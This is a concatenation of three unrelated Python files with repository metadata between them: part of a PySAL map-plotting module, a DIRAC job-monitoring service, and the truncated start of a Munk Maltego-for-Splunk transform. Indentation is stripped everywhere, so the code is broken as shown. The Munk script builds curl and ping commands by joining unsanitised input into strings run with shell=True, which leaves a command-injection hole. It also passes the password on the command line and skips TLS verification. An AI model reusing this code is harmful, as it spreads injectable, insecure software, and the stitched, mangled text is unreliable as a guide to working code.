if type(edgecolor) is pd.Series:
edgecolor = edgecolor.reindex(ids)
mpl_col.set_edgecolor(edgecolor)
if type(linewidth) is pd.Series:
linewidth = linewidth.reindex(ids)
mpl_col.set_linewidth(linewidth)
if type(alpha) is pd.Series:
alpha = alpha.reindex(ids)
mpl_col.set_alpha(alpha)
ax.add_collection(mpl_col, autolim=True)
ax.autoscale_view()
ax.set_axis_off()
if draw:
plt.axis('equal')
plt.show()
return None
def plot_geocol_bk(gc, color=None, facecolor='#4D4D4D', edgecolor='#B3B3B3',
alpha=1., linewidth=0.2, marker_size=10, hover=True, p=None, col=None):
'''
Plot geographical data from the `geometry` column of a PySAL geotable to a
bokeh backend.
...
Arguments
---------
gc : DataFrame
GeoCol with data to be plotted.
col : None/dict
[Optional. Default=None] Dictionary with key, values for entries in hover tool
color : str/tuple/Series
[Optional. Default=None] Wrapper that sets both `facecolor`
and `edgecolor` at the same time. If set, `facecolor` and
`edgecolor` are ignored. It allows for either a single color
or a Series of the same length as `gc` with colors, indexed
on `gc.index`.
facecolor : str/tuple/Series
                      [Optional. Default='#4D4D4D'] Color for polygons and points. It
allows for either a single color or a Series of the same
length as `gc` with colors, indexed on `gc.index`.
edgecolor : str/tuple/Series
                      [Optional. Default='#B3B3B3'] Color for the polygon and point
edges. It allows for either a single color or a Series of
the same length as `gc` with colors, indexed on `gc.index`.
alpha : float/Series
[Optional. Default=1.] Transparency. It allows for either a
single value or a Series of the same length as `gc` with
colors, indexed on `gc.index`.
linewidth : float/Series
[Optional. Default=0.2] Width(s) of the lines in polygon and
line plotting (not applicable to points). It allows for
either a single value or a Series of the same length as `gc`
with colors, indexed on `gc.index`.
marker_size : int
hover : Boolean
Include hover tool
p : bokeh.plotting.figure
[Optional. Default=None] Pre-existing bokeh figure to which
append the collections and setup.
'''
geom = type(gc.iloc[0])
if color is not None:
facecolor = edgecolor = color
draw = False
if not p:
TOOLS="pan,wheel_zoom,box_zoom,reset,save"
if hover:
TOOLS += ',hover'
p = bk.figure(tools=TOOLS,
x_axis_location=None, y_axis_location=None)
p.grid.grid_line_color = None
draw = True
# Geometry plotting
patch_xs = []
patch_ys = []
ids = []
pars = {'fc': facecolor, \
'ec': edgecolor, \
'alpha': alpha, \
'lw': linewidth, \
'ms': marker_size}
## Polygons + Lines
if (geom == ps.cg.shapes.Polygon) or \
(geom == ps.cg.shapes.Chain):
for idx, shape in gc.iteritems():
for ring in shape.parts:
xs, ys = zip(*ring)
patch_xs.append(xs)
patch_ys.append(ys)
ids.append(idx)
if hover and col:
tips = []
ds = dict(x=patch_xs, y=patch_ys)
for k,v in col.iteritems():
ds[k] = v
tips.append((k, "@"+k))
cds = bk.ColumnDataSource(data=ds)
h = p.select_one(HoverTool)
h.point_policy = 'follow_mouse'
h.tooltips = tips
else:
cds = bk.ColumnDataSource(data=dict(
x=patch_xs,
y=patch_ys
))
if type(facecolor) is pd.Series:
cds.add(facecolor.reindex(ids), 'facecolor')
pars['fc'] = 'facecolor'
if type(edgecolor) is pd.Series:
cds.add(edgecolor.reindex(ids), 'edgecolor')
pars['ec'] = 'edgecolor'
if type(alpha) is pd.Series:
cds.add(alpha.reindex(ids), 'alpha')
pars['alpha'] = 'alpha'
if type(linewidth) is pd.Series:
cds.add(linewidth.reindex(ids), 'linewidth')
pars['lw'] = 'linewidth'
if geom == ps.cg.shapes.Polygon:
p.patches('x', 'y', source=cds,
fill_color=pars['fc'],
line_color=pars['ec'],
fill_alpha=pars['alpha'],
line_width=pars['lw']
)
elif geom == ps.cg.shapes.Chain:
p.multi_line('x', 'y', source=cds,
line_color=pars['ec'],
line_alpha=pars['alpha'],
line_width=pars['lw']
)
facecolor = 'None'
## Points
elif geom == ps.cg.shapes.Point:
edgecolor = facecolor
xys = np.array(zip(*gc)).T
cds = bk.ColumnDataSource(data=dict(
x=xys[:, 0],
y=xys[:, 1]
))
if type(facecolor) is pd.Series:
cds.add(facecolor.reindex(ids), 'facecolor')
pars['fc'] = 'facecolor'
if type(edgecolor) is pd.Series:
cds.add(edgecolor.reindex(ids), 'edgecolor')
pars['ec'] = 'edgecolor'
if type(alpha) is pd.Series:
cds.add(alpha.reindex(ids), 'alpha')
pars['alpha'] = 'alpha'
if type(linewidth) is pd.Series:
cds.add(linewidth.reindex(ids), 'linewidth')
pars['lw'] = 'linewidth'
if type(marker_size) is pd.Series:
cds.add(marker_size.reindex(ids), 'marker_size')
pars['ms'] = 'marker_size'
p.circle('x', 'y',
source=cds,
fill_color=pars['fc'],
line_color=pars['ec'],
line_width=pars['lw'],
fill_alpha=pars['alpha'],
line_alpha=pars['alpha'],
size=pars['ms'])
if draw:
bk.show(p)
return None
def plot_poly_lines(shp_link, savein=None, poly_col='none'):
'''
Quick plotting of shapefiles
...
Arguments
---------
shp_link : str
Path to shapefile
savein : str
Path to png file where to dump the plot. Optional,
defaults to None
poly_col : str
Face color of polygons
'''
fig = plt.figure()
shp = ps.open(shp_link)
patchco = map_poly_shp(shp)
patchco.set_facecolor('none')
patchco.set_edgecolor('0.8')
ax = setup_ax([patchco], [shp.bbox])
fig.add_axes(ax)
if savein:
plt.savefig(savein)
else:
print('calling plt.show()')
plt.show()
return None
def plot_choropleth(shp_link, values, type, k=5, cmap=None,
shp_type='poly', sample_fisher=False, title='',
savein=None, figsize=None, dpi=300, alpha=0.4):
'''
Wrapper to quickly create and plot from a lat/lon shapefile
...
Arguments
---------
shp_link : str
Path to shapefile
values : array
Numpy array with values to map
type : str
Type of choropleth. Supported methods:
* 'classless'
* 'unique_values'
* 'quantiles'
* 'fisher_jenks'
* 'equal_interval'
k : int
Number of bins to classify values in and assign a color
to (defaults to 5)
cmap : str
Matplotlib coloring scheme. If None (default), uses:
* 'classless': 'Greys'
* 'unique_values': 'Paired'
* 'quantiles': 'hot_r'
* 'fisher_jenks': 'hot_r'
* 'equal_interval': 'hot_r'
shp_type : str
'poly' (default) or 'line', for the kind of shapefile
passed
sample_fisher : Boolean
Defaults to False, controls whether Fisher-Jenks
classification uses a sample (faster) or the entire
                      array of values. Ignored if
                      'classification' != 'fisher_jenks'. The sample taken
                      at a time amounts to 10% of the values
title : str
Optional string for the title
savein : str
Path to png file where to dump the plot. Optional,
defaults to None
figsize : tuple
Figure dimensions
dpi : int
resolution of graphic file
alpha : float
[Optional. Default=0.4] Transparency of the map.
Returns
-------
    None            : NoneType
                      The map is rendered (and saved to `savein` if set);
                      nothing is returned
'''
shp = ps.open(shp_link)
if shp_type == 'poly':
map_obj = map_poly_shp(shp)
if shp_type == 'line':
map_obj = map_line_shp(shp)
if type == 'classless':
if not cmap:
cmap = 'Greys'
map_obj = base_choropleth_classless(map_obj, values, cmap=cmap)
if type == 'unique_values':
if not cmap:
cmap = 'Paired'
map_obj = base_choropleth_unique(map_obj, values, cmap=cmap)
if type == 'quantiles':
if not cmap:
cmap = 'hot_r'
map_obj = base_choropleth_classif(map_obj, values, k=k, \
classification='quantiles', cmap=cmap)
if type == 'fisher_jenks':
if not cmap:
cmap = 'hot_r'
map_obj = base_choropleth_classif(map_obj, values, k=k, \
classification='fisher_jenks', cmap=cmap, \
sample_fisher=sample_fisher)
if type == 'equal_interval':
if not cmap:
cmap = 'hot_r'
map_obj = base_choropleth_classif(map_obj, values, k=k, \
classification='equal_interval', cmap=cmap)
map_obj.set_alpha(alpha)
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
ax = setup_ax([map_obj], [shp.bbox], ax)
if title:
ax.set_title(title)
if type=='quantiles' or type=='fisher_jenks' or type=='equal_interval':
cmap = map_obj.get_cmap()
norm = map_obj.norm
boundaries = np.round(map_obj.norm.boundaries, decimals=3)
cbar = plt.colorbar(map_obj, cmap=cmap, norm=norm, boundaries=boundaries, \
ticks=boundaries, orientation='horizontal', shrink=0.5)
if savein:
plt.savefig(savein, dpi=dpi)
else:
plt.show()
return None
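# Editor's note: a usage sketch of the one-call interface above. Assumes the
# PySAL example datasets are installed; with no `savein` the map is shown
# via plt.show().
def _example_plot_choropleth():
    shp_link = ps.examples.get_path('columbus.shp')
    values = np.array(ps.open(
        ps.examples.get_path('columbus.dbf')).by_col('HOVAL'))
    plot_choropleth(shp_link, values, 'quantiles', k=5, title='HOVAL')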
# Coding to be used with PySAL scheme
# HH=1, LH=2, LL=3, HL=4
lisa_clrs = {1: '#FF0000', 2: '#66CCFF', 3: '#003399', 4: '#CD5C5C', \
0: '#D3D3D3'}
lisa_lbls = {1: 'HH', 2: 'LH', 3: 'LL', 4: 'HL', \
0: 'Non-significant'}
def plot_lisa_cluster(shp_link, lisa, p_thres=0.01, shp_type='poly',
title='', legend=True, savein=None, figsize=None, dpi=300, alpha=1.,
leg_loc=0):
'''
Plot LISA cluster maps easily
...
Arguments
---------
shp_link : str
Path to shapefile
lisa : Moran_Local
LISA object from PySAL. NOTE: assumes
`geoda_quads=False`
p_thres : float
Significant threshold for clusters
shp_type : str
'poly' (default) or 'line', for the kind of shapefile
passed
title : str
Optional string for the title
legend : Boolean
[Optional. Default=True] Flag to add a legend to the map
savein : str
Path to png file where to dump the plot. Optional,
defaults to None
figsize : tuple
Figure dimensions
dpi : int
resolution of graphic file
alpha : float
                      [Optional. Default=1.] Transparency of the map.
leg_loc : int
[Optional. Default=0] Location of legend. 0: best, 1:
upper right, 2: upper left, 3: lower left, 4: lower
right, 5: right, 6: center left, 7: center right, 8: lower
center, 9: upper center, 10: center.
Returns
-------
    None            : NoneType
                      The map is rendered (and saved to `savein` if set);
                      nothing is returned
'''
shp = ps.open(shp_link)
# Lisa layer
lisa_obj = map_poly_shp(shp)
lisa_obj = base_lisa_cluster(lisa_obj, lisa)
lisa_obj.set_alpha(alpha)
# Figure
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
ax = setup_ax([lisa_obj], [shp.bbox], ax)
# Legend
if legend:
boxes, labels = lisa_legend_components(lisa, p_thres)
plt.legend(boxes, labels, loc=leg_loc, fancybox=True)
if title:
ax.set_title(title)
if savein:
plt.savefig(savein, dpi=dpi)
else:
plt.show()
return None
if __name__ == '__main__':
data = 'none'
if data == 'poly':
shp_link = ps.examples.get_path("sids2.shp")
shp_link = ps.examples.get_path("Polygon.shp")
dbf = ps.open(shp_link.replace('.shp', '.dbf'))
'''
values = np.array(dbf.by_col("SIDR74"))
#values[: values.shape[0]/2] = 1
#values[values.shape[0]/2: ] = 0
'''
patchco = map_poly_shp(ps.open(shp_link))
#patchco = base_choropleth_classif(shp_link, np.random.random(3))
#patchco = plot_choropleth(shp_link, np.random.random(3), 'quantiles')
if data == 'point':
shp_link = ps.examples.get_path("burkitt.shp")
dbf = ps.open(shp_link.replace('.shp', '.dbf'))
patchco = map_point_shp(ps.open(shp_link))
if data == 'line':
shp_link = ps.examples.get_path("eberly_net.shp")
dbf = ps.open(shp_link.replace('.shp', '.dbf'))
values = np.array(dbf.by_col('TNODE'))
mobj = map_line_shp(ps.open(shp_link))
patchco = base_choropleth_unique(mobj, values)
'''
which = values > 1.
for shp_link in [shp_link]:
fig = plt.figure()
patchco = map_poly_shp(shp_link)
patchcoB = map_poly_shp(shp_link, which=which)
patchco.set_facecolor('none')
ax = setup_ax([patchco, patchcoB])
fig.add_axes(ax)
plt.show()
break
xy = (((0, 0), (0, 0)), ((2, 1), (2, 1)), ((3, 1), (3, 1)), ((2, 5), (2, 5)))
xy = np.array([[10, 30], [20, 20]])
markerobj = mpl.markers.MarkerStyle('o')
path = markerobj.get_path().transformed(
markerobj.get_transform())
scales = np.array([2, 2])
fig = plt.figure()
ax = fig.add_subplot(111)
pc = PathCollection((path,), scales, offsets=xy, \
facecolors='r', transOffset=mpl.transforms.IdentityTransform())
#pc.set_transform(mpl.transforms.IdentityTransform())
#_ = _add_axes2col(pc, [0, 0, 5, 5])
ax.add_collection(pc)
fig.add_axes(ax)
#ax = setup_ax([pc], ax)
plt.show()
'''
shp_link = ps.examples.get_path('columbus.shp')
values = np.array(ps.open(ps.examples.get_path('columbus.dbf')).by_col('HOVAL'))
w = ps.queen_from_shapefile(shp_link)
lisa = ps.Moran_Local(values, w, permutations=999)
_ = plot_lisa_cluster(shp_link, lisa)
#_ = plot_choropleth(shp_link, values, 'fisher_jenks')
|
TaylorOshan/pysal
|
pysal/contrib/viz/mapping.py
|
Python
|
bsd-3-clause
| 42,037
|
[
"COLUMBUS"
] |
605b3727f664df5bdc4d7f2465e513c7918b38099f34cac91d7b5d507865bc99
|
""" JobMonitoringHandler is the implementation of the JobMonitoring service
in the DISET framework
The following methods are available in the Service interface
"""
__RCSID__ = "$Id$"
from DIRAC import S_OK, S_ERROR
from DIRAC.Core.DISET.RequestHandler import RequestHandler
import DIRAC.Core.Utilities.Time as Time
from DIRAC.Core.Utilities.Decorators import deprecated
from DIRAC.ConfigurationSystem.Client.Helpers.Operations import Operations
from DIRAC.WorkloadManagementSystem.DB.JobDB import JobDB
from DIRAC.WorkloadManagementSystem.DB.TaskQueueDB import TaskQueueDB
from DIRAC.WorkloadManagementSystem.DB.JobLoggingDB import JobLoggingDB
from DIRAC.WorkloadManagementSystem.Service.JobPolicy import JobPolicy, RIGHT_GET_INFO
# These are global instances of the DB classes
gJobDB = False
gJobLoggingDB = False
gTaskQueueDB = False
SUMMARY = ['JobType', 'Site', 'JobName', 'Owner', 'SubmissionTime',
'LastUpdateTime', 'Status', 'MinorStatus', 'ApplicationStatus']
SUMMARY = []
PRIMARY_SUMMARY = []
FINAL_STATES = ['Done', 'Completed', 'Stalled', 'Failed', 'Killed']
def initializeJobMonitoringHandler(serviceInfo):
global gJobDB, gJobLoggingDB, gTaskQueueDB
gJobDB = JobDB()
gJobLoggingDB = JobLoggingDB()
gTaskQueueDB = TaskQueueDB()
return S_OK()
class JobMonitoringHandler(RequestHandler):
def initialize(self):
credDict = self.getRemoteCredentials()
self.ownerDN = credDict['DN']
self.ownerGroup = credDict['group']
operations = Operations(group=self.ownerGroup)
self.globalJobsInfo = operations.getValue('/Services/JobMonitoring/GlobalJobsInfo', True)
self.jobPolicy = JobPolicy(self.ownerDN, self.ownerGroup, self.globalJobsInfo)
self.jobPolicy.jobDB = gJobDB
return S_OK()
##############################################################################
types_getApplicationStates = []
@staticmethod
def export_getApplicationStates():
""" Return Distinct Values of ApplicationStatus job Attribute in WMS
"""
return gJobDB.getDistinctJobAttributes('ApplicationStatus')
##############################################################################
types_getJobTypes = []
@staticmethod
def export_getJobTypes():
""" Return Distinct Values of JobType job Attribute in WMS
"""
return gJobDB.getDistinctJobAttributes('JobType')
##############################################################################
types_getOwners = []
@staticmethod
def export_getOwners():
"""
Return Distinct Values of Owner job Attribute in WMS
"""
return gJobDB.getDistinctJobAttributes('Owner')
##############################################################################
types_getProductionIds = []
@staticmethod
def export_getProductionIds():
"""
Return Distinct Values of ProductionId job Attribute in WMS
"""
return gJobDB.getDistinctJobAttributes('JobGroup')
##############################################################################
types_getJobGroups = []
@staticmethod
def export_getJobGroups(condDict=None, cutDate=None):
"""
    Return Distinct Values of JobGroup job Attribute in WMS
"""
return gJobDB.getDistinctJobAttributes('JobGroup', condDict,
newer=cutDate)
##############################################################################
types_getSites = []
@staticmethod
def export_getSites():
"""
Return Distinct Values of Site job Attribute in WMS
"""
return gJobDB.getDistinctJobAttributes('Site')
##############################################################################
types_getStates = []
@staticmethod
def export_getStates():
"""
Return Distinct Values of Status job Attribute in WMS
"""
return gJobDB.getDistinctJobAttributes('Status')
##############################################################################
types_getMinorStates = []
@staticmethod
def export_getMinorStates():
"""
Return Distinct Values of Minor Status job Attribute in WMS
"""
return gJobDB.getDistinctJobAttributes('MinorStatus')
##############################################################################
types_getJobs = []
@staticmethod
def export_getJobs(attrDict=None, cutDate=None):
"""
Return list of JobIds matching the condition given in attrDict
"""
# queryDict = {}
# if attrDict:
# if type ( attrDict ) != dict:
# return S_ERROR( 'Argument must be of Dict Type' )
# for attribute in self.queryAttributes:
# # Only those Attribute in self.queryAttributes can be used
# if attrDict.has_key(attribute):
# queryDict[attribute] = attrDict[attribute]
print attrDict
return gJobDB.selectJobs(attrDict, newer=cutDate)
##############################################################################
types_getCounters = [list]
@staticmethod
def export_getCounters(attrList, attrDict=None, cutDate=''):
"""
Retrieve list of distinct attributes values from attrList
with attrDict as condition.
    For each set of distinct values, count the number of occurrences.
Return a list. Each item is a list with 2 items, the list of distinct
attribute values and the counter
"""
# Check that Attributes in attrList and attrDict, they must be in
# self.queryAttributes.
# for attr in attrList:
# try:
# self.queryAttributes.index(attr)
# except:
# return S_ERROR( 'Requested Attribute not Allowed: %s.' % attr )
#
# for attr in attrDict:
# try:
# self.queryAttributes.index(attr)
# except:
# return S_ERROR( 'Condition Attribute not Allowed: %s.' % attr )
cutDate = str(cutDate)
if not attrDict:
attrDict = {}
return gJobDB.getCounters('Jobs', attrList, attrDict, newer=cutDate, timeStamp='LastUpdateTime')
##############################################################################
types_getCurrentJobCounters = []
@staticmethod
def export_getCurrentJobCounters(attrDict=None):
""" Get job counters per Status with attrDict selection. Final statuses are given for
the last day.
"""
if not attrDict:
attrDict = {}
result = gJobDB.getCounters('Jobs', ['Status'], attrDict, timeStamp='LastUpdateTime')
if not result['OK']:
return result
last_update = Time.dateTime() - Time.day
resultDay = gJobDB.getCounters('Jobs', ['Status'], attrDict, newer=last_update,
timeStamp='LastUpdateTime')
if not resultDay['OK']:
return resultDay
resultDict = {}
for statusDict, count in result['Value']:
status = statusDict['Status']
resultDict[status] = count
if status in FINAL_STATES:
resultDict[status] = 0
for statusDayDict, ccount in resultDay['Value']:
if status == statusDayDict['Status']:
resultDict[status] = ccount
break
return S_OK(resultDict)
##############################################################################
types_getJobStatus = [int]
@staticmethod
def export_getJobStatus(jobID):
return gJobDB.getJobAttribute(jobID, 'Status')
##############################################################################
types_getJobOwner = [int]
@staticmethod
def export_getJobOwner(jobID):
return gJobDB.getJobAttribute(jobID, 'Owner')
##############################################################################
types_getJobSite = [int]
@staticmethod
def export_getJobSite(jobID):
return gJobDB.getJobAttribute(jobID, 'Site')
##############################################################################
types_getJobJDL = [int, bool]
@staticmethod
def export_getJobJDL(jobID, original):
return gJobDB.getJobJDL(jobID, original=original)
##############################################################################
types_getJobLoggingInfo = [int]
@staticmethod
def export_getJobLoggingInfo(jobID):
return gJobLoggingDB.getJobLoggingInfo(jobID)
##############################################################################
types_getJobsParameters = [list, list]
@staticmethod
@deprecated("Unused")
def export_getJobsParameters(jobIDs, parameters):
if not (jobIDs and parameters):
return S_OK({})
return gJobDB.getAttributesForJobList(jobIDs, parameters)
##############################################################################
types_getJobsStatus = [list]
@staticmethod
def export_getJobsStatus(jobIDs):
if not jobIDs:
return S_OK({})
return gJobDB.getAttributesForJobList(jobIDs, ['Status'])
##############################################################################
types_getJobsMinorStatus = [list]
@staticmethod
def export_getJobsMinorStatus(jobIDs):
return gJobDB.getAttributesForJobList(jobIDs, ['MinorStatus'])
##############################################################################
types_getJobsApplicationStatus = [list]
@staticmethod
def export_getJobsApplicationStatus(jobIDs):
return gJobDB.getAttributesForJobList(jobIDs, ['ApplicationStatus'])
##############################################################################
types_getJobsSites = [list]
@staticmethod
def export_getJobsSites(jobIDs):
return gJobDB.getAttributesForJobList(jobIDs, ['Site'])
##############################################################################
types_getJobSummary = [int]
@staticmethod
def export_getJobSummary(jobID):
return gJobDB.getJobAttributes(jobID, SUMMARY)
##############################################################################
types_getJobPrimarySummary = [int]
@staticmethod
def export_getJobPrimarySummary(jobID):
return gJobDB.getJobAttributes(jobID, PRIMARY_SUMMARY)
##############################################################################
types_getJobsSummary = [list]
@staticmethod
def export_getJobsSummary(jobIDs):
if not jobIDs:
return S_ERROR('JobMonitoring.getJobsSummary: Received empty job list')
result = gJobDB.getAttributesForJobList(jobIDs, SUMMARY)
# return result
restring = str(result['Value'])
return S_OK(restring)
##############################################################################
types_getJobPageSummaryWeb = [dict, list, int, int]
def export_getJobPageSummaryWeb(self, selectDict, sortList, startItem, maxItems, selectJobs=True):
""" Get the summary of the job information for a given page in the
job monitor in a generic format
"""
resultDict = {}
startDate = selectDict.get('FromDate', None)
if startDate:
del selectDict['FromDate']
# For backward compatibility
if startDate is None:
startDate = selectDict.get('LastUpdate', None)
if startDate:
del selectDict['LastUpdate']
endDate = selectDict.get('ToDate', None)
if endDate:
del selectDict['ToDate']
result = self.jobPolicy.getControlledUsers(RIGHT_GET_INFO)
if not result['OK']:
return S_ERROR('Failed to evaluate user rights')
if result['Value'] != 'ALL':
selectDict[('Owner', 'OwnerGroup')] = result['Value']
# Sorting instructions. Only one for the moment.
if sortList:
orderAttribute = sortList[0][0] + ":" + sortList[0][1]
else:
orderAttribute = None
statusDict = {}
result = gJobDB.getCounters('Jobs', ['Status'], selectDict,
newer=startDate,
older=endDate,
timeStamp='LastUpdateTime')
nJobs = 0
if result['OK']:
for stDict, count in result['Value']:
nJobs += count
statusDict[stDict['Status']] = count
resultDict['TotalRecords'] = nJobs
if nJobs == 0:
return S_OK(resultDict)
resultDict['Extras'] = statusDict
if selectJobs:
iniJob = startItem
if iniJob >= nJobs:
return S_ERROR('Item number out of range')
result = gJobDB.selectJobs(selectDict, orderAttribute=orderAttribute,
newer=startDate, older=endDate, limit=(maxItems, iniJob))
if not result['OK']:
return S_ERROR('Failed to select jobs: ' + result['Message'])
summaryJobList = result['Value']
if not self.globalJobsInfo:
validJobs, _invalidJobs, _nonauthJobs, _ownJobs = self.jobPolicy.evaluateJobRights(summaryJobList,
RIGHT_GET_INFO)
summaryJobList = validJobs
result = gJobDB.getAttributesForJobList(summaryJobList, SUMMARY)
if not result['OK']:
return S_ERROR('Failed to get job summary: ' + result['Message'])
summaryDict = result['Value']
# Evaluate last sign of life time
for jobID, jobDict in summaryDict.items():
if jobDict['HeartBeatTime'] == 'None':
jobDict['LastSignOfLife'] = jobDict['LastUpdateTime']
else:
lastTime = Time.fromString(jobDict['LastUpdateTime'])
hbTime = Time.fromString(jobDict['HeartBeatTime'])
# There is no way to express a timedelta of 0 ;-)
# Not only Stalled jobs but also Failed jobs because Stalled
if ((hbTime - lastTime) > (lastTime - lastTime) or
jobDict['Status'] == "Stalled" or
jobDict['MinorStatus'].startswith('Job stalled') or
jobDict['MinorStatus'].startswith('Stalling')):
jobDict['LastSignOfLife'] = jobDict['HeartBeatTime']
else:
jobDict['LastSignOfLife'] = jobDict['LastUpdateTime']
tqDict = {}
result = gTaskQueueDB.getTaskQueueForJobs(summaryJobList)
if result['OK']:
tqDict = result['Value']
# If no jobs can be selected after the properties check
if not summaryDict.keys():
return S_OK(resultDict)
# prepare the standard structure now
key = summaryDict.keys()[0]
paramNames = summaryDict[key].keys()
records = []
for jobID, jobDict in summaryDict.items():
jParList = []
for pname in paramNames:
jParList.append(jobDict[pname])
jParList.append(tqDict.get(jobID, 0))
records.append(jParList)
resultDict['ParameterNames'] = paramNames + ['TaskQueueID']
resultDict['Records'] = records
return S_OK(resultDict)
##############################################################################
types_getJobStats = [basestring, dict]
@staticmethod
def export_getJobStats(attribute, selectDict):
""" Get job statistics distribution per attribute value with a given selection
"""
startDate = selectDict.get('FromDate', None)
if startDate:
del selectDict['FromDate']
# For backward compatibility
if startDate is None:
startDate = selectDict.get('LastUpdate', None)
if startDate:
del selectDict['LastUpdate']
endDate = selectDict.get('ToDate', None)
if endDate:
del selectDict['ToDate']
result = gJobDB.getCounters('Jobs', [attribute], selectDict,
newer=startDate,
older=endDate,
timeStamp='LastUpdateTime')
resultDict = {}
if result['OK']:
for cDict, count in result['Value']:
resultDict[cDict[attribute]] = count
return S_OK(resultDict)
##############################################################################
types_getJobsPrimarySummary = [list]
@staticmethod
def export_getJobsPrimarySummary(jobIDs):
return gJobDB.getAttributesForJobList(jobIDs, PRIMARY_SUMMARY)
##############################################################################
types_getJobParameter = [[basestring, int, long], basestring]
@staticmethod
def export_getJobParameter(jobID, parName):
"""
:param str/int/long jobID: one single Job ID
:param str parName: one single parameter name
"""
res = gJobDB.getJobParameters(jobID, [parName])
if not res['OK']:
return res
return S_OK(res['Value'].get(int(jobID), {}))
##############################################################################
types_getJobParameters = [[basestring, int, long, list]]
@staticmethod
def export_getJobParameters(jobIDs, parName=None):
"""
:param str/int/long/list jobIDs: one single job ID or a list of them
:param str parName: one single parameter name, or None (meaning all of them)
"""
return gJobDB.getJobParameters(jobIDs, parName)
##############################################################################
types_traceJobParameter = [basestring, [basestring, int, long, list],
basestring, [basestring, None],
[basestring, None]]
@staticmethod
def export_traceJobParameter(site, localID, parameter, date, until):
return gJobDB.traceJobParameter(site, localID, parameter, date, until)
##############################################################################
types_traceJobParameters = [basestring, [basestring, int, long, list],
[list, None], [list, None],
[basestring, None], [basestring, None]]
@staticmethod
def export_traceJobParameters(site, localID, parameterList, attributeList, date, until):
return gJobDB.traceJobParameters(site, localID, parameterList, attributeList, date, until)
##############################################################################
types_getAtticJobParameters = [[int, long]]
@staticmethod
def export_getAtticJobParameters(jobID, parameters=None, rescheduleCycle=-1):
if not parameters:
parameters = []
return gJobDB.getAtticJobParameters(jobID, parameters, rescheduleCycle)
##############################################################################
types_getJobAttributes = [int]
@staticmethod
def export_getJobAttributes(jobID):
return gJobDB.getJobAttributes(jobID)
##############################################################################
types_getJobAttribute = [int, basestring]
@staticmethod
def export_getJobAttribute(jobID, attribute):
return gJobDB.getJobAttribute(jobID, attribute)
##############################################################################
types_getSiteSummary = []
@staticmethod
def export_getSiteSummary():
return gJobDB.getSiteSummary()
##############################################################################
types_getJobHeartBeatData = [int]
@staticmethod
def export_getJobHeartBeatData(jobID):
return gJobDB.getHeartBeatData(jobID)
##############################################################################
types_getInputData = [[int, long]]
@staticmethod
def export_getInputData(jobID):
""" Get input data for the specified jobs
"""
return gJobDB.getInputData(jobID)
##############################################################################
types_getOwnerGroup = []
@staticmethod
def export_getOwnerGroup():
"""
Return Distinct Values of OwnerGroup from the JobsDB
"""
return gJobDB.getDistinctJobAttributes('OwnerGroup')
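# Editor's note (not part of the service): a sketch of the merging rule in
# export_getCurrentJobCounters, applied to dummy counter data. Counts of
# jobs in FINAL_STATES are replaced by the counts of the last day only.
def _exampleCurrentJobCounters():
  allTime = {'Running': 12, 'Done': 3400, 'Failed': 150}
  lastDay = {'Done': 25, 'Failed': 4}
  resultDict = {}
  for status, count in allTime.items():
    if status in FINAL_STATES:
      resultDict[status] = lastDay.get(status, 0)
    else:
      resultDict[status] = count
  return resultDict  # {'Running': 12, 'Done': 25, 'Failed': 4}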
|
andresailer/DIRAC
|
WorkloadManagementSystem/Service/JobMonitoringHandler.py
|
Python
|
gpl-3.0
| 19,283
|
[
"DIRAC"
] |
4ccf006f1ce159462313222d0bd09734dc1d5262d47a9d9c2ce16f24f98aec04
|
# List Splunk Hosts by Sourcetype
# For use with Munk - Maltego for Splunk
# Author: Brian Warehime @nulltr0n
# 9/6/2014
# Importing various modules
from MaltegoTransform import *
import subprocess
import sys
import re
import ConfigParser
import os
# Configuration Parser to grab necessary options.
def getLocalConfPath():
pathname = os.path.dirname(sys.argv[0])
pathname = os.path.abspath(pathname)
pathname = os.path.join(pathname, '..','local', 'munk.conf')
return os.path.normpath(pathname)
configFile = getLocalConfPath()
config = ConfigParser.SafeConfigParser()
config.read(configFile)
username = config.get('credentials', 'username')
password = config.get('credentials', 'password')
auth = config.get('splunk','auth')
searchhead = config.get('splunk','searchhead')
timeframe = config.get('splunk', 'timeframe')
status = config.get('splunk', 'status')
management = config.get('splunk', 'management')
proxy = config.get('splunk', 'proxy')
proxy_ip = config.get('splunk','proxy_ip')
proxy_port = config.get('splunk', 'proxy_port')
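# Illustrative munk.conf layout matching the keys read above (all values are
# placeholders, not real credentials or hosts):
#
# [credentials]
# username = admin
# password = changeme
#
# [splunk]
# auth = 1
# searchhead = splunk.example.com
# management = 8089
# timeframe = -24h
# status = 0
# proxy = 0
# proxy_ip = 127.0.0.1
# proxy_port = 1080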
# Setting up Maltego entities and getting initial variables.
me = MaltegoTransform()
me.parseArguments(sys.argv)
sourcetype = sys.argv[1]
hostip = me.getVar("host")
# Determine which REST call to make based on authentication setting.
if auth == "1":
if proxy == "1":
output = subprocess.check_output('curl -u ' + username + ':' + password + ' -s -k --socks5 ' + proxy_ip + ':' + proxy_port + ' --data-urlencode search="search index=* earliest=' + timeframe + ' sourcetype=' + sourcetype + ' | table host | dedup host" -d "output_mode=csv" https://' + searchhead + ':' + management + '/servicesNS/admin/search/search/jobs/export', shell=True)
else:
output = subprocess.check_output('curl -u ' + username + ':' + password + ' -s -k --data-urlencode search="search index=* earliest=' + timeframe + ' sourcetype=' + sourcetype + ' | table host | dedup host" -d "output_mode=csv" https://' + searchhead + ':' + management + '/servicesNS/admin/search/search/jobs/export', shell=True)
else:
if proxy == "1":
output = subprocess.check_output('curl -s -k --socks5 ' + proxy_ip + ':' + proxy_port + ' --data-urlencode search="search index=* earliest=' + timeframe + ' sourcetype=' + sourcetype + ' | table host | dedup host" -d "output_mode=csv" https://' + searchhead + ':' + management + '/servicesNS/admin/search/search/jobs/export', shell=True)
else:
output = subprocess.check_output('curl -s -k --data-urlencode search="search index=* earliest=' + timeframe + ' sourcetype=' + sourcetype + ' | table host | dedup host" -d "output_mode=csv" https://' + searchhead + ':' + management + '/servicesNS/admin/search/search/jobs/export', shell=True)
# Regex to find hosts
hosts = re.findall(r'.+', output)
host = []
for i in hosts:
if i[0] == '"':
host.append(i[1:-1])
else:
host.append(i)
# Remove header value
host.remove('host')
# Adding new Host entities and properties.
for a in host:
ent = me.addEntity("munk.Host",a)
ent.addAdditionalFields('link#maltego.link.color','LinkColor','','0x86B34A')
# If status is set, ping the server and set the bookmark color based on response.
if status == "1":
try:
# use a separate name so the 'status' config flag is not clobbered
# by the ping output on later iterations
ping_output = subprocess.check_output('ping -c 1 ' + a, shell=True)
if "bytes from" in ping_output:
